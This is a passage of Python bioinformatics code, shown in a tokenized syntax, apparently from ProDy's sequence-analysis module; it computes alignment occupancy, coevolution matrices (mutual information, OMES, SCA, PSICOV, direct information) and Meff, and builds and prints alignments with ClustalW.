``'res'`` or ``'col'`` for *occ*) or sequences (``'seq'`` or ``'row'``
for *occ*) of *msa*, which may be an :class:`.MSA` instance or a 2D
NumPy character array. By default, occupancy [0-1] will be calculated.
If *count* is **True**, count of non-gap characters will be returned.
Implementation is case insensitive."""<import_from_stmt>.msatools msaocc<line_sep>msa=getMSA(msa)<try_stmt><block_start>dim=occ.startswith('res')<or>occ.startswith('col')<block_end><except_stmt>AttributeError<block_start><raise>TypeError('occ must be a string')<block_end>occ=zeros(msa.shape[int(dim)] float)<line_sep><return>msaocc(msa occ dim count=bool(count))<block_end><def_stmt>applyMutinfoNorm mutinfo entropy norm='sument'<block_start>"""Apply one of the normalizations discussed in [MLC05]_ to *mutinfo*
matrix. *norm* can be one of the following:
* ``'sument'``: :math:`H(X) + H(Y)`, sum of entropy of columns
* ``'minent'``: :math:`min\{H(X), H(Y)\}`, minimum entropy
* ``'maxent'``: :math:`max\{H(X), H(Y)\}`, maximum entropy
* ``'mincon'``: :math:`min\{H(X|Y), H(Y|X)\}`, minimum conditional
entropy
* ``'maxcon'``: :math:`max\{H(X|Y), H(Y|X)\}`, maximum conditional
entropy
where :math:`H(X)` is the entropy of a column, and
:math:`H(X|Y) = H(X) - MI(X, Y)`. Normalization with joint entropy, i.e.
:math:`H(X, Y)`, can be done using :func:`.buildMutinfoMatrix` *norm*
argument.
.. [MLC05] <NAME>, <NAME>, <NAME>, <NAME>. Using information theory
to search for co-evolving residues in proteins. *Bioinformatics*
**2005** 21(22):4116-4124."""<try_stmt><block_start>ndim,shape=mutinfo.ndim mutinfo.shape<block_end><except_stmt>AttributeError<block_start><raise>TypeError('mutinfo must be a 2D square array')<block_end><if_stmt>ndim<ne>2<or>shape[0]<ne>shape[1]<block_start><raise>ValueError('mutinfo must be a 2D square array')<block_end><try_stmt><block_start>ndim,shapent=entropy.ndim entropy.shape<block_end><except_stmt>AttributeError<block_start><raise>TypeError('entropy must be a numpy array')<block_end><if_stmt>ndim<ne>1<block_start><raise>ValueError('entropy must be a 1D array')<block_end><if_stmt>shapent[0]<ne>shape[0]<block_start><raise>ValueError('shape of mutinfo and entropy does not match')<block_end><try_stmt><block_start>sw=norm.startswith<block_end><except_stmt>AttributeError<block_start><raise>TypeError('norm must be a string')<block_end><if_stmt>sw('sument')<block_start>norm=<lambda>i_val j_val val:i_val+j_val<block_end><elif_stmt>sw('minent')<block_start>norm=<lambda>i_val j_val val:min(i_val j_val)<block_end><elif_stmt>sw('maxent')<block_start>norm=<lambda>i_val j_val val:max(i_val j_val)<block_end><elif_stmt>sw('mincon')<block_start>norm=<lambda>i_val j_val val:min(i_val-val j_val-val)<block_end><elif_stmt>sw('maxcon')<block_start>norm=<lambda>i_val j_val val:max(i_val-val j_val-val)<block_end><elif_stmt>sw('joint')<block_start><raise>ValueError('for joint entropy normalization, use '<concat>'buildMutinfoMatrix function')<block_end><else_stmt><block_start><raise>ValueError('norm={0} is not a valid normalization type'.format(norm))<block_end>mi=mutinfo.copy()<for_stmt>i,i_val enumerate(entropy)<block_start><for_stmt>j,j_val enumerate(entropy)<block_start>val=mi[i j]<line_sep>div=norm(i_val j_val val)<if_stmt>div<eq>0<block_start>mi[i j]=0<block_end><else_stmt><block_start>mi[i j]<augdiv>div<block_end><block_end><block_end><return>mi<block_end><def_stmt>applyMutinfoCorr mutinfo corr='prod'<block_start>"""Returns a copy of *mutinfo* array after average product correction
(default) or average sum correction is applied. See [DSD08]_ for details.
.. [DSD08] <NAME>, <NAME>, <NAME>. Mutual information without the
influence of phylogeny or entropy dramatically improves residue
contact prediction. *Bioinformatics* **2008** 24(3):333-340."""<try_stmt><block_start>ndim,shape=mutinfo.ndim mutinfo.shape<block_end><except_stmt>AttributeError<block_start><raise>TypeError('mutinfo must be a 2D square array')<block_end><if_stmt>ndim<ne>2<or>shape[0]<ne>shape[1]<block_start><raise>ValueError('mutinfo must be a 2D square array')<block_end><try_stmt><block_start>sw=corr.startswith<block_end><except_stmt>AttributeError<block_start><raise>TypeError('correction must be a string')<block_end>avg_mipos=mutinfo.sum(1)/(shape[0]-1)<line_sep>avg_mi=avg_mipos.mean()<line_sep>mi=mutinfo.copy()<if_stmt>sw('prod')<or>sw('apc')<block_start><for_stmt>i,i_avg enumerate(avg_mipos)<block_start><for_stmt>j,j_avg enumerate(avg_mipos)<block_start>mi[i j]<augsub>(i_avg<times>j_avg)/avg_mi<block_end><block_end><block_end><elif_stmt>sw('sum')<or>sw('asc')<block_start><for_stmt>i,i_avg enumerate(avg_mipos)<block_start><for_stmt>j,j_avg enumerate(avg_mipos)<block_start>mi[i j]<augsub>i_avg+j_avg-avg_mi<block_end><block_end><block_end><else_stmt><block_start><raise>ValueError('correction must be prod or sum, not '+corr)<block_end><return>mi<block_end><def_stmt>filterRankedPairs pdb indices msa_indices rank_row rank_col zscore_sort num_of_pairs=20 seqDistance=5 resi_range=<none> pdbDistance=8 chain1='A' chain2='A'<block_start>'''
indices and msa_indices are lists output from alignSequenceToMSA
rank_row, rank_col and zscore_sort are the outputs from calcRankorder
:arg num_of_pairs: The number of pairs to be output. If no value is given,
all pairs are output. Default is 20
:type num_of_pairs: int
:arg seqDistance: Remove pairs that are closer than this in the reference sequence
Default is 5
:type seqDistance: int
:arg pdbDistance: Remove pairs with Calpha atoms further apart than this in the PDB
Default is 8
:type pdbDistance: int
:arg chain1: The chain used for the residue specified by rank_row when measuring distances
:type chain1: str
:arg chain2: The chain used for the residue specified by rank_col when measuring distances
:type chain2: str
'''<if_stmt>isscalar(indices)<block_start><raise>TypeError('Please provide a valid indices list')<block_end><if_stmt>isscalar(msa_indices)<block_start><raise>TypeError('Please provide valid msa_indices, which should be a list')<block_end><if_stmt>isscalar(rank_row)<block_start><raise>TypeError('Please provide ranked row from calcRankorder')<block_end><if_stmt>isscalar(rank_col)<block_start><raise>ValueError('Please provide ranked col from calcRankorder')<block_end><if_stmt>isscalar(zscore_sort)<block_start><raise>ValueError('Please provide sorted Z scores from calcRankorder')<block_end><if_stmt>num_of_pairs<is><none><block_start>num_of_pairs=len(rank_row)<block_end>pairList=[]<line_sep>i=-1<line_sep>j=0<while_stmt>j<l>num_of_pairs<block_start>i<augadd>1<line_sep>row_idx=indices[where(msa_indices<eq>rank_row[i])[0][0]]<line_sep>col_idx=indices[where(msa_indices<eq>rank_col[i])[0][0]]<if_stmt><not>isinstance(row_idx Integral)<or><not>isinstance(col_idx Integral)<block_start><continue><block_end><if_stmt>row_idx-col_idx<l>seqDistance<block_start><continue><block_end>distance=calcDistance(pdb.select('chain %s and resid %s'%(chain1 row_idx)).copy() pdb.select('chain %s and resid %s'%(chain2 row_idx)).copy())<if_stmt>distance<g>pdbDistance<block_start><continue><block_end><if_stmt>resi_range<is><not><none><block_start><if_stmt><not>row_idx<in>resi_range<and><not>col_idx<in>resi_range<block_start><continue><block_end><block_end>pairList.append('%3d:\t%3d\t%3d\t%5.1f\t%5.1f\n'%(i row_idx col_idx zscore_sort[i] distance))<line_sep>j<augadd>1<block_end><return>pairList<block_end><def_stmt>buildSeqidMatrix msa turbo=<true><block_start>"""Returns sequence identity matrix for *msa*."""<line_sep>msa=getMSA(msa)<line_sep>LOGGER.timeit('_seqid')<import_from_stmt>.seqtools msaeye<line_sep>dim=msa.shape[0]<line_sep>seqid=msaeye(msa ones((dim dim) float) turbo=bool(turbo))<line_sep>LOGGER.report('Sequence identity matrix was calculated in %.2fs.' '_seqid')<line_sep><return>seqid<block_end>buildSeqidMatrix.__doc__<augadd>doc_turbo<def_stmt>uniqueSequences msa seqid=0.98 turbo=<true><block_start>"""Returns a boolean array marking unique sequences in *msa*. A sequence
sharing sequence identity of *seqid* or more with another sequence coming
before itself in *msa* will have a **True** value in the array."""<line_sep>msa=getMSA(msa)<import_from_stmt>.seqtools msaeye<if_stmt><not>(0<l>seqid<le>1)<block_start><raise>ValueError('seqid must satisfy 0 < seqid <= 1')<block_end><return>msaeye(msa zeros(msa.shape[0] bool) unique=seqid turbo=bool(turbo))<block_end>uniqueSequences.__doc__<augadd>doc_turbo<def_stmt>calcRankorder matrix zscore=<false> **kwargs<block_start>"""Returns indices of elements and corresponding values sorted in
descending order, if *descend* is **True** (default). Can apply a zscore
normalization; by default along *axis* - 0 such that each column has
``mean=0`` and ``std=1``. If *zcore* analysis is used, return value contains the
zscores. If matrix is symmetric only lower triangle indices will be
returned, with diagonal elements if *diag* is **True** (default)."""<try_stmt><block_start>ndim,shape=matrix.ndim matrix.shape<block_end><except_stmt>AttributeError<block_start><raise>TypeError('matrix must be a 2D array')<block_end><if_stmt>ndim<ne>2<block_start><raise>ValueError('matrix must be a 2D array')<block_end>threshold=kwargs.get('thredhold' 0.0001)<try_stmt><block_start>symm=abs((matrix.transpose()-matrix).max())<l>threshold<block_end><except_stmt><block_start>symm=<false><block_end><if_stmt>zscore<block_start>axis=int(bool(kwargs.get('axis' 0)))<line_sep>matrix=(matrix-matrix.mean(axis))/matrix.std(axis)<line_sep>LOGGER.info('Zscore normalization has been applied.')<block_end>descend=kwargs.get('descend' <true>)<if_stmt><not>symm<block_start><if_stmt>descend<block_start>sorted_index=matrix.argsort(axis=<none>)[::-1]<block_end><else_stmt><block_start>sorted_index=matrix.argsort(axis=<none>)<block_end>row=indices(shape)[0].flatten()[sorted_index]<line_sep>column=indices(shape)[1].flatten()[sorted_index]<block_end><else_stmt><block_start>LOGGER.info('Matrix is symmetric, only lower triangle indices '<concat>'will be returned.')<if_stmt>kwargs.get('diag' <true>)<block_start>k=0<block_end><else_stmt><block_start>k=-1<block_end>ind_row,ind_column=tril_indices(shape[0] k=k)<line_sep>matrix_lt=matrix[ind_row ind_column]<if_stmt>descend<block_start>sorted_index=matrix_lt.argsort(axis=<none>)[::-1]<block_end><else_stmt><block_start>sorted_index=matrix_lt.argsort(axis=<none>)<block_end>row=ind_row[sorted_index]<line_sep>column=ind_column[sorted_index]<block_end><return>(row column matrix[row column])<block_end><def_stmt>buildOMESMatrix msa ambiguity=<true> turbo=<true> **kwargs<block_start>"""Returns OMES (Observed Minus Expected Squared) covariance matrix
calculated for *msa*, which may be an :class:`.MSA` instance or a 2D
NumPy character array. OMES is defined as::
OMES_(i,j) = sum((N_OBS - N_EX)^2 / N_EX) = N * sum((f_i,j - f_i * f_j)^2 / (f_i * f_j))
Implementation is case insensitive and handles ambiguous amino acids
as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters are considered as distinct types. All non-alphabet characters
are considered as gaps."""<line_sep>msa=getMSA(msa)<import_from_stmt>.msatools msaomes<line_sep>LOGGER.timeit('_omes')<line_sep>length=msa.shape[1]<line_sep>omes=empty((length length) float)<line_sep>omes=msaomes(msa omes ambiguity=bool(ambiguity) turbo=bool(turbo) debug=bool(kwargs.get('debug' <false>)))<line_sep>LOGGER.report('OMES matrix was calculated in %.2fs.' '_omes')<line_sep><return>omes<block_end>buildOMESMatrix.__doc__<augadd>doc_turbo<def_stmt>buildSCAMatrix msa turbo=<true> **kwargs<block_start>"""Returns SCA matrix calculated for *msa*, which may be an :class:`.MSA`
instance or a 2D Numpy character array.
Implementation is case insensitive and handles ambiguous amino acids
as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters are considered as distinct types. All non-alphabet characters
are considered as gaps."""<line_sep>msa=getMSA(msa)<if_stmt>msa.shape[0]<l>100<block_start>LOGGER.warning('SCA performs the best with higher number of sequences, and '<concat>'minimal number of sequences is recommended as 100.')<block_end><import_from_stmt>.msatools msasca<line_sep>LOGGER.timeit('_sca')<line_sep>length=msa.shape[1]<line_sep>sca=zeros((length length) float)<line_sep>sca=msasca(msa sca turbo=bool(turbo))<line_sep>LOGGER.report('SCA matrix was calculated in %.2fs.' '_sca')<line_sep><return>sca<block_end>buildSCAMatrix.__doc__<augadd>doc_turbo<def_stmt>buildPCMatrix msa turbo=<false> **kwargs<block_start>"""Returns PC matrix calculated for *msa*, which may be an :class:`.MSA`
instance or a 2D Numpy character array.
Implementation is case insensitive and handles ambiguous amino acids
as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters are considered as distinct types. All non-alphabet characters
are considered as gaps.
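A minimal usage sketch (the MSA file name is illustrative only)::
from prody import parseMSA
msa = parseMSA('family.fasta')
pc = buildPCMatrix(msa, turbo=False)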
"""<line_sep>msa=getMSA(msa)<import_from_stmt>.msatools msapsicov<line_sep>LOGGER.timeit('_psicov')<line_sep>length=msa.shape[1]<line_sep>pc=zeros((length length) float)<line_sep>pc=msapsicov(msa pc turbo=bool(turbo))<line_sep>LOGGER.report('PC matrix was calculated in %.2fs.' '_psicov')<line_sep><return>pc<block_end><def_stmt>buildDirectInfoMatrix msa seqid=.8 pseudo_weight=.5 refine=<false> **kwargs<block_start>"""Returns direct information matrix calculated for *msa*, which may be an
:class:`.MSA` instance or a 2D Numpy character array.
Sequences sharing sequence identity of *seqid* or more with another
sequence are regarded as similar sequences for calculating their weights
using :func:`.calcMeff`.
*pseudo_weight* is the weight for the pseudocount probability.
Sequences are not refined by default. When *refine* is set **True**,
the MSA will be refined by the first sequence and the shape of direct
information matrix will be smaller.
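A minimal usage sketch (the MSA file name is illustrative only)::
from prody import parseMSA
msa = parseMSA('family.slx')
di = buildDirectInfoMatrix(msa, seqid=0.8, pseudo_weight=0.5, refine=False)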
"""<line_sep>msa=getMSA(msa)<import_from_stmt>.msatools msadipretest msadirectinfo1 msadirectinfo2<import_from_stmt>numpy matrix<line_sep>LOGGER.timeit('_di')<if_stmt>msa.shape[0]<l>250<block_start>LOGGER.warning('DI performs the best with higher number of sequences, and '<concat>'minimal number of sequences is recommended as 250.')<block_end>refine=1<if>refine<else>0<line_sep># msadipretest get some parameter from msa to set matrix size
length,q=msadipretest(msa refine=refine)<line_sep>c=matrix.dot(matrix(zeros((length<times>q 1) float)) matrix(zeros((1 length<times>q) float)))<line_sep>prob=zeros((length q+1) float)<line_sep># msadirectinfo1 return c to be inversed and prob to be used
meff,n,length,c,prob=msadirectinfo1(msa c prob theta=1.-seqid pseudocount_weight=pseudo_weight refine=refine q=q+1)<line_sep>c=c.I<line_sep>di=zeros((length length) float)<line_sep># get final DI
di=msadirectinfo2(n length c prob di q+1)<del_stmt>prob c<line_sep>LOGGER.report('DI matrix was calculated in %.2fs.' '_di')<line_sep><return>di<block_end><def_stmt>calcMeff msa seqid=.8 refine=<false> weight=<false> **kwargs<block_start>"""Returns the Meff for *msa*, which may be an :class:`.MSA`
instance or a 2D Numpy character array.
Since similar sequences in an *msa* decrease the diversity of the *msa*,
*Meff* gives a weight for sequences in the *msa*.
For example, if one sequence in the MSA has 5 similar sequences in the
MSA (itself included), the weight of this sequence is defined as 1/5 = 0.2.
Meff is the sum of all sequence weights. In other words, Meff can be
understood as the effective number of independent sequences.
Sequences sharing sequence identity of *seqid* or more with another
sequence are regarded as similar sequences to calculate Meff.
Sequences are not refined by default. When *refine* is set **True**, the
MSA will be refined by the first sequence.
The weights for each sequence are returned when *weight* is **True**."""<line_sep>msa=getMSA(msa)<import_from_stmt>.msatools msameff<line_sep>LOGGER.timeit('_meff')<line_sep>refine=1<if>refine<else>0<line_sep>weight=0<if>weight<else>1# meff_only flag for msameff: 0 also returns the per-sequence weight array.
<if_stmt>(<not>weight)<block_start>w=zeros((msa.shape[0]) float)<line_sep>meff=msameff(msa theta=1.-seqid meff_only=weight refine=refine w=w)<block_end><else_stmt><block_start>meff=msameff(msa theta=1.-seqid meff_only=weight refine=refine)<block_end>LOGGER.report('Meff was calculated in %.2fs.' '_meff')<line_sep><return>meff<block_end><def_stmt>alignSequencesByChain PDBs **kwargs<block_start>"""
Runs :func:`buildMSA` for each chain and optionally joins the results.
Returns either a single :class:`MSA` or a dictionary containing an :class:`MSA` for each chain.
:arg PDBs: a list of :class:`AtomGroup` objects
:type PDBs: list
:arg join_chains: whether to join chain alignments
default is True
:type join_chains: bool
:arg join_char: a character for joining chain alignments
default is '/' as used by PIR format alignments
:type join_char: str
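A minimal usage sketch (PDB identifiers are placeholders; all structures must
have the same number of chains)::
from prody import parsePDB
pdbs = [parsePDB('1xxx'), parsePDB('2yyy')]
msa = alignSequencesByChain(pdbs, join_chains=True, join_char='/')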
"""<if_stmt>isscalar(PDBs)<block_start><raise>TypeError('PDBs should be array-like')<block_end><if_stmt><not>PDBs<block_start><raise>ValueError('PDBs should not be empty')<block_end>pdbs=[]<line_sep>chains=[]<for_stmt>i,pdb enumerate(PDBs)<block_start><if_stmt>isinstance(pdb Atomic)<block_start>pdbs.append(pdb)<block_end><else_stmt><block_start><raise>TypeError('each entry in PDBs must be a :class:`Atomic` instance')<block_end>chains.append([])<for_stmt>chain list(pdbs[i].getHierView())<block_start>chains[i].append(chain)<block_end><if_stmt>i<ne>0<and>len(chains[i])<ne>len(chains[0])<block_start><raise>ValueError('all pdbs should have the same number of chains')<block_end><block_end>labels=[]<for_stmt>pdb pdbs<block_start>chids=''<for_stmt>chain list(pdb.getHierView())<block_start>chids<augadd>chain.getChid()<block_end>labels.append(pdb.getTitle()+'_'+chids)<block_end>chains=array(chains)<line_sep>chain_alignments=[]<line_sep>alignments={}<for_stmt>j range(len(chains[0]))<block_start>prefix='chain_'+chains[0 j].getChid()<line_sep>msa=buildMSA(chains[: j] title=prefix labels=labels)<line_sep>msa=refineMSA(msa colocc=1e-9)# remove gap-only cols
chain_alignments.append(msa)<line_sep>alignments[labels[0].split('_')[1][j]]=msa<block_end>join_chains=kwargs.get('join_chains' <true>)<line_sep>join_char=kwargs.get('join_char' '/')<if_stmt>len(chains[0])<eq>1<block_start>join_chains=<false><block_end><if_stmt>join_chains<block_start>joined_msaarr=[]<for_stmt>i,chain_alignment enumerate(chain_alignments)<block_start>pdb_seqs=[]<for_stmt>j,sequence enumerate(chain_alignment)<block_start>pdb_seqs.append(sequence)<block_end>joined_msaarr.append(join_char.join(pdb_seqs))<block_end>result=MSA(joined_msaarr title='joined_chains' labels=[label.split('_')[0]<for>label labels])<block_end><else_stmt><block_start>result=alignments<if_stmt>len(result)<eq>1<block_start>result=result[list(result.keys())[0]]<block_end><block_end><return>result<block_end><def_stmt>buildMSA sequences title='Unknown' labels=<none> **kwargs<block_start>"""
Aligns sequences with clustalw or clustalw2 and returns the resulting MSA.
:arg sequences: a file, MSA object or a list or array containing sequences
as Atomic objects with :func:`getSequence` or Sequence objects or strings.
If strings are used then labels must be provided using ``labels``
:type sequences: :class:`Atomic`, :class:`.MSA`,
:class:`~numpy.ndarray`, str
:arg title: the title for the MSA; it will also be used as the prefix for output files.
:type title: str
:arg labels: a list of labels to go with the sequences
:type labels: list
:arg align: whether to align the sequences
default True
:type align: bool
:arg method: alignment method, one of either 'global' (biopython.pairwise2.align.globalms),
'local' (biopython.pairwise2.align.localms), clustalw(2), or another software in your path.
Default is 'clustalw'
:type method: str
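A minimal usage sketch (toy sequences; with the default method a ClustalW
executable must be available on the path)::
seqs = ['MKTAYIAKQR', 'MKTAYIAKQK', 'MKTAYLAKQR']
msa = buildMSA(seqs, title='toy', labels=['seq1', 'seq2', 'seq3'])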
"""<line_sep>align=kwargs.get('align' <true>)<line_sep>method=kwargs.pop('method' 'clustalw')<line_sep># 1. check if sequences are in a fasta file and if not make one
<if_stmt>isinstance(sequences str)<block_start>filename=sequences<block_end><elif_stmt><not>isinstance(sequences MSA)<block_start><try_stmt><block_start>max_len=0<for_stmt>sequence sequences<block_start><if_stmt>isinstance(sequence Atomic)<block_start><if_stmt>len(sequence.ca.copy())<g>max_len<block_start>max_len=len(sequence.ca.copy())<block_end><block_end><elif_stmt>isinstance(sequence MSA)<block_start><if_stmt>len(sequence[0])<g>max_len<block_start>max_len=len(sequence[0])<block_end><block_end><else_stmt><block_start><if_stmt>len(sequence)<g>max_len<block_start>max_len=len(sequence)<block_end><block_end><block_end>msa=[]<line_sep>fetched_labels=[]<for_stmt>i,sequence enumerate(sequences)<block_start><if_stmt>isinstance(sequence Atomic)<block_start>strseq=sequence.ca.getSequence()<line_sep>label=sequence.getTitle()<block_end><elif_stmt>isinstance(sequence Sequence)<block_start>strseq=str(sequence)<line_sep>label=sequence.getLabel()<block_end><elif_stmt>isinstance(sequence MSA)<block_start>strseq=str(sequence[0])<line_sep>label=sequence.getLabel(0)<line_sep>LOGGER.warn('Only the first sequence in the MSA at entry {0} is used.'.format(i))<block_end><elif_stmt>isinstance(sequence str)<block_start>strseq=sequence<line_sep>label=str(i+1)<block_end><else_stmt><block_start><raise>TypeError('sequences should be a list of strings, '<concat>'Atomic, or Sequence instances')<block_end>strseq=strseq+'-'<times>(max_len-len(strseq))<line_sep>msa.append(array(list(strseq)))<line_sep>fetched_labels.append(label)<block_end>sequences=array(msa)<block_end><except_stmt><block_start><raise>TypeError('sequences should be iterable')<block_end># "if a list" is a pythonic way to check if a list is empty or not (or none)
<if_stmt><not>labels<and>fetched_labels<block_start>labels=fetched_labels<block_end>labels=[label.replace(' ' '_')<for>label labels]<line_sep># label checks are removed here because they are handled properly in MSA class initialization
msa=MSA(msa=sequences title=title labels=labels)<if_stmt>align<and>'clustal'<in>method<block_start>filename=writeMSA(title+'.fasta' msa)<block_end><block_end><if_stmt>align# 2. find and run alignment method
<block_start><if_stmt>method<in>['biopython' 'local' 'global']<block_start><if_stmt>len(sequences)<eq>2<block_start>msa,_,_=alignTwoSequencesWithBiopython(sequences[0] sequences[1] **kwargs)<block_end><else_stmt><block_start><raise>ValueError("Provide only two sequences or another method. \
Biopython pairwise alignment can only be used \
to build an MSA with two sequences.")<block_end><block_end><elif_stmt>'clustalw'<in>method<block_start>clustalw=which('clustalw')<if_stmt>clustalw<is><none><block_start><if_stmt>which('clustalw2')<is><not><none><block_start>clustalw=which('clustalw2')<block_end><else_stmt><block_start><raise>EnvironmentError("The executable for clustalw was not found, \
install clustalw or add it to the path.")<block_end><block_end>os.system('"%s" %s -OUTORDER=INPUT'%(clustalw filename))<line_sep># 3. parse and return the new MSA
msa=parseMSA(title+'.aln')<block_end><else_stmt><block_start>alignTool=which(method)<if_stmt>alignTool<is><none><block_start><raise>EnvironmentError("The executable for {0} was not found, \
install it or add it to the path.".format(method))<block_end>os.system('"%s" %s -OUTORDER=INPUT'%(alignTool filename))<line_sep># 3. parse and return the new MSA
msa=parseMSA(title+'.aln')<block_end><block_end><return>msa<block_end><def_stmt>showAlignment alignment **kwargs<block_start>"""
Prints out an alignment as sets of short rows with labels.
:arg alignment: any object with aligned sequences
:type alignment: :class:`.MSA`, list
:arg row_size: the size of each row
default 60
:type row_size: int
:arg indices: a set of indices for some or all sequences
that will be shown above the relevant sequences
:type indices: :class:`~numpy.ndarray`, list
:arg index_start: how far along the alignment to start putting indices
default 0
:type index_start: int
:arg index_stop: how far along the alignment to stop putting indices
default the point when the shortest sequence stops
:type index_stop: int
:arg labels: a list of labels
:type labels: list
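A minimal usage sketch (assuming *msa* is an :class:`.MSA` parsed elsewhere)::
showAlignment(msa, row_size=60)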
"""<line_sep>row_size=kwargs.get('row_size' 60)<line_sep>labels=kwargs.get('labels' <none>)<if_stmt>labels<is><not><none><block_start><if_stmt>isscalar(labels)<block_start><raise>TypeError('labels should be array-like')<block_end><for_stmt>label labels<block_start><if_stmt><not>isinstance(label str)<block_start><raise>TypeError('each label should be a string')<block_end><block_end><if_stmt>len(labels)<l>len(alignment)<block_start><raise>ValueError('there should be a label for every sequence shown')<block_end><block_end><else_stmt><block_start>labels=[]<for_stmt>i,sequence enumerate(alignment)<block_start><if_stmt>hasattr(sequence 'getLabel')<block_start>labels.append(sequence.getLabel())<block_end><else_stmt><block_start>labels.append(str(i+1))<block_end><block_end><block_end>indices=kwargs.get('indices' <none>)<line_sep>index_start=kwargs.get('index_start' 0)<line_sep>index_stop=kwargs.get('index_stop' 0)<if_stmt>index_stop<eq>0<and>indices<is><not><none><block_start>locs=[]<line_sep>maxes=[]<for_stmt>index indices<block_start>int_index=[]<for_stmt>i index<block_start><if_stmt>i<eq>''<block_start>int_index.append(0)<block_end><else_stmt><block_start>int_index.append(int(i))<block_end><block_end>int_index=array(int_index)<line_sep>maxes.append(max(int_index))<line_sep>locs.append(where(int_index<eq>max(int_index))[0][0])<block_end>index_stop=locs[where(maxes<eq>min(maxes))[0][0]]<block_end><for_stmt>i range(int(ceil(len(alignment[0])/float(row_size))))<block_start><for_stmt>j range(len(alignment))<block_start><if_stmt>indices<is><not><none><block_start>sys.stdout.write('\n'+' '<times>15+'\t')<for_stmt>k range(row_size<times>i+10 row_size<times>(i+1)+10 10)<block_start><try_stmt><block_start><if_stmt>k<g>index_start+10<and>k<l>index_stop+10<block_start>sys.stdout.write('{:10d}'.format(int(indices[j][k-1])))<block_end><elif_stmt>k<l>index_stop<block_start>sys.stdout.write(' '<times>(k-index_start))<block_end><else_stmt><block_start>sys.stdout.write(' '<times>10)<block_end><block_end><except_stmt><block_start>sys.stdout.write(' '<times>10)<block_end><block_end>sys.stdout.write('\n')<block_end>sys.stdout.write(labels[j][:15]+' '<times>(15-len(labels[j][:15]))+'\t'+str(alignment[j])[60<times>i:60<times>(i+1)]+'\n')<block_end>sys.stdout.write('\n')<block_end><return><block_end><def_stmt>alignSequenceToMSA seq msa **kwargs<block_start>"""
Align a sequence from a PDB or Sequence to a sequence from an MSA
and create two sets of indices.
The sequence from the MSA (*seq*), the alignment and
the two sets of indices are returned.
The first set (*indices*) maps the residue numbers in the PDB to
the reference sequence. The second set (*msa_indices*) indexes the
reference sequence in the msa and is used for retrieving values
from the first indices.
:arg seq: an object with an associated sequence string
or a sequence string itself
:type seq: :class:`.Atomic`, :class:`.Sequence`, str
:arg msa: a multiple sequence alignment
:type msa: :class:`.MSA`
:arg label: a label for a sequence in msa or a PDB ID
``msa.getIndex(label)`` must return a sequence index
:type label: str
:arg chain: which chain from pdb to use for alignment, default is **None**,
which does no selection on *seq*. This value will be ignored if seq is
not an :class:`.Atomic` object.
:type chain: str
Parameters for Biopython ``pairwise2`` alignments can be provided as
keyword arguments. Default values are originally from ``proteins.compare``
module, but now found in ``utilities.seqtools``.
:arg match: a positive integer, used to reward finding a match
:type match: int
:arg mismatch: a negative integer, used to penalise finding a mismatch
:type mismatch: int
:arg gap_opening: a negative integer, used to penalise opening a gap
:type gap_opening: int
:arg gap_extension: a negative integer, used to penalise extending a gap
:type gap_extension: int
:arg method: method for pairwise2 alignment.
Possible values are ``"local"`` and ``"global"``
:type method: str
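A minimal usage sketch (the PDB identifier, MSA file name and label are
placeholders)::
from prody import parsePDB, parseMSA
ag = parsePDB('1xxx')
msa = parseMSA('family.slx')
aln, indices, msa_indices = alignSequenceToMSA(ag, msa, label='1xxx', chain='A')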
"""<line_sep>label=kwargs.get('label' <none>)<line_sep>chain=kwargs.get('chain' <none>)<line_sep>match=kwargs.get('match' MATCH_SCORE)<line_sep>mismatch=kwargs.get('mismatch' MISMATCH_SCORE)<line_sep>gap_opening=kwargs.get('gap_opening' GAP_PENALTY)<line_sep>gap_extension=kwargs.get('gap_extension' GAP_EXT_PENALTY)<line_sep>method=kwargs.get('method' ALIGNMENT_METHOD)<if_stmt>isinstance(seq Atomic)<block_start><if_stmt>isinstance(chain str)<block_start>ag=seq.select('chain {0}'.format(chain))<block_end><elif_stmt>chain<is><none><block_start>ag=seq<line_sep>chids=ag.getChids()<if_stmt>len(unique(chids))<g>1<block_start>LOGGER.warn('%s consists of multiple chains. Please consider selecting one chain'%(seq.getTitle()))<block_end><block_end><else_stmt><block_start><raise>TypeError('chain should be a string or None')<block_end><if_stmt>ag<is><none><block_start><raise>ValueError('seq may be None or chain ID may be invalid')<block_end>sequence=ag.select('ca').getSequence()<block_end><elif_stmt>isinstance(seq Sequence)<block_start>sequence=str(seq)<line_sep>ag=<none><block_end><elif_stmt>isinstance(seq str)<block_start>sequence=seq<line_sep>ag=<none><block_end><else_stmt><block_start><raise>TypeError('seq must be an atomic class, sequence class, or str not {0}'.format(type(seq)))<block_end><if_stmt><not>isinstance(msa MSA)<block_start><raise>TypeError('msa must be an MSA instance')<block_end><if_stmt>label<is><none><block_start><if_stmt>ag<block_start>label=ag.getTitle().split('_')[0]<block_end><elif_stmt>isinstance(seq 